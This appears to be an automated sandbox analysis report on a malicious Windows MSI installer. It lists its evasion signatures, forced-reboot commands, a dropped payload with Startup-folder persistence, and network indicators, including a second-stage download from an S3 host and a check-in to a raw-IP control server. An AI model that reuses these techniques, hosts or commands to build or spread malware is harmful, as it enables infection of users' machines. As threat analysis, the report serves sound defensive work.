Edit tour

Windows Analysis Report
AOEI-LEHOLLZCZW.msi

Overview

General Information

Sample Name:	AOEI-LEHOLLZCZW.msi
Analysis ID:	778344
MD5:	0e079de8e9f5c8df67e4e045797214f8
SHA1:	d7f79a99e513b70e18497dd5c049b180790e0fa3
SHA256:	41d756c67066d30c6deaab2de7ecb02b9e1eee8e7ef41c4a9948e8549b2973da
Tags:	msi
Infos:

Detection

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Uses shutdown.exe to shutdown or reboot the system

Drops PE files to the user root directory

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

PE file contains sections with non-standard names

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Stores files to the Windows start menu directory

JA3 SSL client fingerprint seen in connection with other malware

Found dropped PE file which has not been started or loaded

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Binary contains a suspicious time stamp

Creates a start menu entry (Start Menu\Programs\Startup)

Checks for available system drives (often done to infect USB drives)

Drops PE files to the user directory

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

Process Tree

System is w10x64

msiexec.exe (PID: 5896 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\AOEI-LEHOLLZCZW.msi" MD5: 4767B71A318E201188A0D0A420C8B608)

msiexec.exe (PID: 6092 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)

msiexec.exe (PID: 736 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 1731ACBB29F16859495353965C830558 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

cmd.exe (PID: 5152 cmdline: "C:\Windows\System32\cmd.exe" /C shutdown -r -f -t 60 MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

shutdown.exe (PID: 4528 cmdline: shutdown -r -f -t 60 MD5: E2EB9CC0FE26E28406FB6F82F8E81B26)

cmd.exe (PID: 5164 cmdline: "C:\Windows\system32\cmd.exe" /c shutdown /r /t 1 /f MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 2820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

shutdown.exe (PID: 3108 cmdline: shutdown /r /t 1 /f MD5: E2EB9CC0FE26E28406FB6F82F8E81B26)

LtfQdc.exe (PID: 5540 cmdline: "C:\Users\user\LtfQdc.exe" MD5: E90BBFCDFDA75CB22FEDF1B94F8F20F6)

cleanup

Snort Signatures

ETPRO MALWARE TakeMyFile User-Agent - Source IP: 192.168.2.3 - Destination IP: 54.205.202.31

Timestamp:	192.168.2.354.205.202.3149698802849814 01/05/23-13:18:31.506567
SID:	2849814
Source Port:	49698
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE TakeMyFile Installer Checkin - Source IP: 192.168.2.3 - Destination IP: 54.205.202.31

Timestamp:	192.168.2.354.205.202.3149698802849813 01/05/23-13:18:31.506567
SID:	2849813
Source Port:	49698
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST / HTTP/1.1Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64)Host: collect.installeranalytics.comContent-Length: 167Cache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: mzrdmodlonnce.s3.amazonaws.com

Source: global traffic	HTTP traffic detected: GET /digivolve.msi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: mzrdmodlonnce.s3.amazonaws.com
Source: global traffic	HTTP traffic detected: GET /megazord2023/index.php HTTP/1.1User-Agent: "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36"Host: 20.203.138.85Connection: Keep-Alive

Source: unknown

HTTPS traffic detected: 52.217.160.129:443 -> 192.168.2.3:49691 version: TLS 1.2

System Summary

Uses shutdown.exe to shutdown or reboot the system

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -f -t 60

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI5548.tmp

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\Installer\6f14c4.msi

Jump to behavior

Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CD2380	18_2_00CD2380
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CD3550	18_2_00CD3550
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CD1960	18_2_00CD1960
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CD00C0	18_2_00CD00C0
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00C94024	18_2_00C94024
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CFD1E0	18_2_00CFD1E0
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00C991F0	18_2_00C991F0
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CE01F0	18_2_00CE01F0
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CD8180	18_2_00CD8180
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00C8614D	18_2_00C8614D
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CE4280	18_2_00CE4280
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CBF250	18_2_00CBF250
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00C8626D	18_2_00C8626D
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00C96214	18_2_00C96214
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00C9A3AC	18_2_00C9A3AC
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00C86349	18_2_00C86349
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CD6340	18_2_00CD6340
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00D1F347	18_2_00D1F347
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CEB350	18_2_00CEB350
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00D0637B	18_2_00D0637B
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CEE37C	18_2_00CEE37C
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00C824C0	18_2_00C824C0
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CBE4D0	18_2_00CBE4D0
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00C97468	18_2_00C97468
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CFB5D0	18_2_00CFB5D0
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00C81540	18_2_00C81540
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CCF530	18_2_00CCF530
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00C866D5	18_2_00C866D5
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CC56A0	18_2_00CC56A0
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CEC6A0	18_2_00CEC6A0
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00C85650	18_2_00C85650
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CDC650	18_2_00CDC650
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CF1660	18_2_00CF1660
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00C8867D	18_2_00C8867D
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CD0670	18_2_00CD0670
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00C868DD	18_2_00C868DD
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00C998D4	18_2_00C998D4
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CAA880	18_2_00CAA880
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CFA880	18_2_00CFA880
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00C818B0	18_2_00C818B0
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CD29D0	18_2_00CD29D0
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00C819E0	18_2_00C819E0
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CF99E0	18_2_00CF99E0
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CEA940	18_2_00CEA940
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CBD920	18_2_00CBD920
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CECAE4	18_2_00CECAE4
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CCAAE0	18_2_00CCAAE0
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00D17AE0	18_2_00D17AE0
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00C85A80	18_2_00C85A80
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00C84A80	18_2_00C84A80
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00C82AB0	18_2_00C82AB0
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CC5AB0	18_2_00CC5AB0

Source: C:\Users\user\LtfQdc.exe	Code function: String function: 00C93BFF appears 32 times
Source: C:\Users\user\LtfQdc.exe	Code function: String function: 00C96D4C appears 114 times

Source: AOEI-LEHOLLZCZW.msi	Binary or memory string: OriginalFilenameAICustAct.dllF vs AOEI-LEHOLLZCZW.msi
Source: AOEI-LEHOLLZCZW.msi	Binary or memory string: OriginalFilenameSoftwareDetector.dllF vs AOEI-LEHOLLZCZW.msi
Source: AOEI-LEHOLLZCZW.msi	Binary or memory string: OriginalFilenameInstallerAnalytics.dllF vs AOEI-LEHOLLZCZW.msi
Source: AOEI-LEHOLLZCZW.msi	Binary or memory string: OriginalFilenameembeddeduiproxy.dllF vs AOEI-LEHOLLZCZW.msi

Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\AOEI-LEHOLLZCZW.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 1731ACBB29F16859495353965C830558
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C shutdown -r -f -t 60
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c shutdown /r /t 1 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -f -t 60
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 1 /f
Source: unknown	Process created: C:\Users\user\LtfQdc.exe "C:\Users\user\LtfQdc.exe"
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 1731ACBB29F16859495353965C830558	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C shutdown -r -f -t 60	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c shutdown /r /t 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -f -t 60	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 1 /f	Jump to behavior

Source: C:\Users\user\LtfQdc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Jump to behavior

Source: LtfQdc.lnk.2.dr

LNK file: ..\..\..\..\..\..\..\LtfQdc.exe

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Roaming\Relatorio R.T.N Digitalizado

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DFA5C81456786AA235.TMP

Jump to behavior

Source: shi4601.tmp.2.dr

Binary string: o\Device\NameResTrk\RecordNrtCloneOpenPacketW

Source: classification engine

Classification label: mal68.rans.evad.winMSI@15/41@3/3

Source: C:\Windows\SysWOW64\msiexec.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\LtfQdc.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: AOEI-LEHOLLZCZW.msi

Static file information: TRID: Microsoft Windows Installer (77509/1) 52.18%

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5212:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2820:120:WilError_01
Source: C:\Users\user\LtfQdc.exe	Mutant created: \Sessions\1\BaseNamedObjects\aaa22225Adx,Avrrthr@232323

Source: C:\Windows\SysWOW64\msiexec.exe

File written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\pantaleao.ini

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: AOEI-LEHOLLZCZW.msi

Static file information: File size 3409408 > 1048576

Source:	Binary string: wininet.pdb source: shi4601.tmp.2.dr
Source:	Binary string: C:\JobRelease\win\Release\bin\x86\embeddeduiproxy.pdb source: AOEI-LEHOLLZCZW.msi, 6f14c4.msi.1.dr, 6f14c7.msi.1.dr
Source:	Binary string: D:\a\_work\e\src\out\Release\identity_helper.exe.pdbOGP source: LtfQdc.exe, 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmp, LtfQdc.exe, 00000012.00000000.296794060.0000000000D26000.00000002.00000001.01000000.00000005.sdmp, digimn.bz2.2.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: AOEI-LEHOLLZCZW.msi, 6f14c4.msi.1.dr, MSI59EF.tmp.1.dr, 6f14c7.msi.1.dr
Source:	Binary string: D:\a\_work\e\src\out\Release\identity_helper.exe.pdb source: LtfQdc.exe, 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmp, LtfQdc.exe, 00000012.00000000.296794060.0000000000D26000.00000002.00000001.01000000.00000005.sdmp, digimn.bz2.2.dr
Source:	Binary string: d3d12.pdbUGP source: shi472B.tmp.2.dr
Source:	Binary string: d3d12.pdb source: shi472B.tmp.2.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb\ source: AOEI-LEHOLLZCZW.msi, 6f14c4.msi.1.dr, MSI59EF.tmp.1.dr, 6f14c7.msi.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\InstallerAnalytics.pdbu source: AOEI-LEHOLLZCZW.msi, MSI6D02.tmp.1.dr, MSI67ED.tmp.1.dr, 6f14c4.msi.1.dr, MSI5548.tmp.1.dr, MSI5FAD.tmp.1.dr, 6f14c7.msi.1.dr, MSI60A8.tmp.1.dr
Source:	Binary string: wininet.pdbUGP source: shi4601.tmp.2.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\InstallerAnalytics.pdb source: AOEI-LEHOLLZCZW.msi, MSI6D02.tmp.1.dr, MSI67ED.tmp.1.dr, 6f14c4.msi.1.dr, MSI5548.tmp.1.dr, MSI5FAD.tmp.1.dr, 6f14c7.msi.1.dr, MSI60A8.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: AOEI-LEHOLLZCZW.msi, 6f14c4.msi.1.dr, MSI58C4.tmp.1.dr, MSI6750.tmp.1.dr, 6f14c7.msi.1.dr, MSI5962.tmp.1.dr, MSI57F8.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbg source: AOEI-LEHOLLZCZW.msi, 6f14c4.msi.1.dr, MSI58C4.tmp.1.dr, MSI6750.tmp.1.dr, 6f14c7.msi.1.dr, MSI5962.tmp.1.dr, MSI57F8.tmp.1.dr

Source: C:\Users\user\LtfQdc.exe

Code function: 18_2_00C87A90 push 89084589h; iretd

18_2_00C87A95

Source: shi4601.tmp.2.dr	Static PE information: section name: .wpp_sf
Source: shi4601.tmp.2.dr	Static PE information: section name: .didat
Source: shi472B.tmp.2.dr	Static PE information: section name: .text_hf
Source: shi472B.tmp.2.dr	Static PE information: section name: .didat
Source: shi472B.tmp.2.dr	Static PE information: section name: .DDIData
Source: digimn.bz2.2.dr	Static PE information: section name: .00cfg
Source: digimn.bz2.2.dr	Static PE information: section name: .voltbl
Source: digimn.bz2.2.dr	Static PE information: section name: malloc_h

Source: shi4601.tmp.2.dr

Static PE information: 0x84CD8294 [Wed Aug 8 17:47:00 2040 UTC]

Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\digimn.bz2			Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\garurumon.bz2			Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI5962.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI5FAD.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\digimn.bz2	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\garurumon.bz2	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI57F8.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\LtfQdc.exe (copy)	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI6D02.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\shi472B.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI6750.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI58C4.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI5548.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI59EF.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI60A8.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\shi4601.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\msedge_elf.dll (copy)	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI67ED.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI5962.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI5FAD.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI57F8.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI6D02.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI6750.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI58C4.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI5548.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI59EF.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI60A8.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI67ED.tmp	Jump to dropped file

Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\digimn.bz2	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\garurumon.bz2	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\LtfQdc.exe (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\msedge_elf.dll (copy)	Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\digimn.bz2	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\garurumon.bz2	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\LtfQdc.exe (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\msedge_elf.dll (copy)	Jump to dropped file

Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\pantaleao.ini			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LtfQdc.lnk			Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LtfQdc.lnk

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
